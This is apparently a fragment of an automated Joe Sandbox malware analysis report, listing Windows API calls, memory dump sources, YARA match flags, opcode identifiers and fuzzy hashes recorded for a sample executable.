                                            • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                            • __alloca_probe_16.LIBCMT ref: 1000A736
                                            • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                            • __freea.LIBCMT ref: 1000A837
                                            • __freea.LIBCMT ref: 1000A843
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __alloca_probe_16__freea$Info
                                            • String ID:
                                            • API String ID: 2330168043-0
                                            • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                            • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                            • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                            • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 1000B03B
                                            • __alloca_probe_16.LIBCMT ref: 1000B101
                                            • __freea.LIBCMT ref: 1000B16D
                                              • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            • __freea.LIBCMT ref: 1000B176
                                            • __freea.LIBCMT ref: 1000B199
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                            • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                            • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                            • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16
                                            • String ID:
                                            • API String ID: 3509577899-0
                                            • Opcode ID: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                            • Instruction ID: 4c9d79601316440c19376aba07ff063d820f792dd0d59d6e63cf9a27365d0914
                                            • Opcode Fuzzy Hash: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                            • Instruction Fuzzy Hash: 3D51BE72600246AFEB259F618C8CFBB36A9FF84718F158069FF04D7180EB70ED109660
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00415095
                                            • __alloca_probe_16.LIBCMT ref: 0041515E
                                            • __freea.LIBCMT ref: 004151C5
                                              • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            • __freea.LIBCMT ref: 004151D8
                                            • __freea.LIBCMT ref: 004151E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                            • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B32D2F
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B32D44
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B32D52
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B32D6D
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B32D8C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                            • String ID:
                                            • API String ID: 2509773233-0
                                            • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction ID: 826ff1e2edcabbf60cb91cee75bfe535ac794d9965bc4320b1427217ef8226aa
                                            • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction Fuzzy Hash: A2312635B00104AFDB14DF59DC40FAAB7A8EF48701F8541E9EA05EB252DB71BD16CB94
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                            • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                            APIs
                                            • _free.LIBCMT ref: 1000C536
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 1000C548
                                            • _free.LIBCMT ref: 1000C55A
                                            • _free.LIBCMT ref: 1000C56C
                                            • _free.LIBCMT ref: 1000C57E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                            • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                            • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                            • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free
                                            • String ID: *?
                                            • API String ID: 269201875-2564092906
                                            • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                            • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                            • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                            • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8&$C:\Users\user\Desktop\file.exe
                                            • API String ID: 0-1426767573
                                            • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                            • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                            • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                            • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
                                            • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                            • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                            • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                            • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                            • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                            • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04B49956
                                              • Part of subcall function 04B451BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B45422,?,00000000,-00000008), ref: 04B45220
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04B49BA8
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B49BEE
                                            • GetLastError.KERNEL32 ref: 04B49C91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction ID: 5fcce8b90ce36d0b1d4be8a8766b1e5253630f7b42e27f622126a9e68c5a0279
                                            • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction Fuzzy Hash: B3D16CB5E002589FDB15CFE8D880AAEBBF4FF88314F1445AAE456EB351D630A942DB50
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(CA335CE0,00000000,00000000,00000000), ref: 004196EF
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                            • GetLastError.KERNEL32 ref: 00419A2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                            • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B31C3C
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B31C5F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID:
                                            • API String ID: 3197321146-0
                                            • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction ID: 95f8702ef9bb3bf689eef3f329dca10c55fe83ac12d6f192b76f9b7fd893c877
                                            • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction Fuzzy Hash: 04C14BB09002289FEB25DF69CC84BE9B7B8EF49305F1041D9E409A7290DB75BE94CF91
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: a6ba87058cd3c44807563c279ca24a7e780eaa52e66a2012573d5a7f03c6ba02
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: C0511472608606AFEF288F17D840BBA77A4FF04316F1409ADDD014B29AE731F940DB90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: 9694da84b36eb9287e89cb83653fc82a80706d9e770c7a4cce22b02214fb0c83
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: 3D51D4B1601306AFEBA99F51DC40B7AF7B6EF04710F14412DEA094B290E73AFA91D794
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                            • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 04B3183C
                                              • Part of subcall function 04B39AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04B39AB5
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04B31872
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04B318A9
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 04B319BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID:
                                            • API String ID: 2123813255-0
                                            • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction ID: adb05ec7583511e2c6a15048a151db4dbeef6cf3ff1d0abbd7ffe9812893b520
                                            • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction Fuzzy Hash: 7E411CB1A00300ABE7149F6A9C8575AB7FCEF48315F1007A9E95AD7280E771BD05C7A1
                                            APIs
                                              • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                              • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                            • GetLastError.KERNEL32 ref: 10007C36
                                            • __dosmaperr.LIBCMT ref: 10007C3D
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                            • __dosmaperr.LIBCMT ref: 10007C83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                            • String ID:
                                            • API String ID: 167067550-0
                                            • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                            • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                            • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                            • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                            APIs
                                              • Part of subcall function 04B451BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B45422,?,00000000,-00000008), ref: 04B45220
                                            • GetLastError.KERNEL32 ref: 04B4776F
                                            • __dosmaperr.LIBCMT ref: 04B47776
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04B477B0
                                            • __dosmaperr.LIBCMT ref: 04B477B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 88c5d71980c9e0409075f78dccfd4b193e14b2e76ddf052b2edb26fd323ec9cc
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: C121C671600206AFEB20AF75CCC4D6BB7ACFF8826874085A8E92997150EF30FC41EB50
                                            APIs
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • GetLastError.KERNEL32 ref: 00417508
                                            • __dosmaperr.LIBCMT ref: 0041750F
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                            • __dosmaperr.LIBCMT ref: 00417550
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: 68290cb5ce439fea42b8e551a1101b6167a57ad641936364ea8229848b4c173d
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: 3C219971A00205AFEB10AF7DCC489AB77ADFF842697014595E91AD7150E730FD81AB60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
